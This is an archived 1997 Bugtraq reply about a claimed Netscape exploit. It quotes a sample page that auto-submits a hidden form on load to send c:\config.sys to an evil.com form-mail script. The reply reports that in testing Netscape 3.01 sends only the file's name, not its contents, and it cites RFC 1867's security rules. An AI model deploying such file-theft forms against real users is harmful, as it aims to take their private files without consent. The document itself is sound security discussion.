Bugtraq mailing list archives
Re: Netscape Exploit
From: espel () LLAIC UNIV-BPCLERMONT FR (Roger Espel Llima)
Date: Sun, 15 Jun 1997 00:16:45 +0200
On Sat, Jun 14, 1997 at 07:21:30PM -0500, root wrote:
Here is a sample it isn't complete but you get the basic idea of what is going on
<HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD> <BODY onLoad="daForm.submit()">
That should be "document.daForm.submit()".
<FORM NAME="daForm" ACTION="http://evil.com/cgi-bin/formmail.pl" METHOD=POST> <INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your Harddrive"> <INPUT TYPE=HIDDEN NAME="recipient" value="foobar () evil com">
It doesn't seem to be this simple; with this fragment, Netscape never sends the file's contents, but only the words "Save this document in your hard drive" as well as the selected file's name, all in an url-encoded POST request. The file's contents aren't sent at all. I tried to do something similar, with inputs of type "file" and given default "value" values, and Netscape (3.01) has been consistently ignoring them. Here's what the server gets, with this: POST / HTTP/1.0 Referer: file:/path/to/attempted/exploit.html Connection: Keep-Alive User-Agent: Mozilla/3.01 (X11; I; SunOS 4.1.3_U1 sun4m) Host: localhost:7777 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Content-type: application/x-www-form-urlencoded Content-length: 72 Save+This+Document+on+your%0AHarddrive=&recipient=foo () bar org Adding the attribute ENCTYPE="multiplart/form-data" doesn't seem to help, either; it just changes the format. I haven't had any luck either with changing the value of document.daForm.save_this_... from javascript. RFC 1867 about the form-based file upload in HTML has these security considerations: | 8. Security Considerations | | It is important that a user agent not send any file that the user has | not explicitly asked to be sent. Thus, HTML interpreting agents are | expected to confirm any default file names that might be suggested | with <INPUT TYPE=file VALUE="yyyy">. Never have any hidden fields be | able to specify any file. and Netscape navigator (3.01) seems to follow them... I'm willing to believe that there's a bug somewhere around there, but it's not that simple. Roger -- e-mail: espel () llaic univ-bpclermont fr, espel () unix bigots org WWW page & PGP key: http://www.eleves.ens.fr:8080/home/espel/index.html
Current thread:
- Solaris x86 buffer overflows, (continued)
- Solaris x86 buffer overflows jim bresler (Jun 12)
- CERT Advisory CA-97.18 - Vulnerability in the at(1) program Aleph One (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Rick Byers (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program The Nolander (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Thomas Koenig (Jun 14)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Adam Morrison (Jun 15)
- Netscape Exploit root (Jun 14)
- Bug in SGI's /cgi-bin/handler Razvan Dragomirescu (Jun 14)
- Re: Bug in SGI's /cgi-bin/handler Yaron Yanay (Jun 15)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Rick Byers (Jun 12)
- sendmail 8.8.6 released Eric Allman (Jun 14)
- Re: Netscape Exploit Roger Espel Llima (Jun 14)
- Re: Netscape Exploit Micah Brandon (Jun 14)
- Re: Netscape Exploit Manoj Kasichainula (Jun 15)
- rshd gives away usernames David Holland (Jun 13)
- Re: rshd gives away usernames Erik Troan (Jun 13)
- Re: rshd gives away usernames Eric (Jun 13)
- Re: rshd gives away usernames Todd C. Miller (Jun 13)
- Re: rshd gives away usernames Alan Brown (Jun 14)
- Changing default UMASK for all daemons Dax Kelson (Jun 13)
- Re: Changing default UMASK for all daemons Joe Traister (Jun 14)
- Re: Changing default UMASK for all daemons Michael Helm (Jun 14)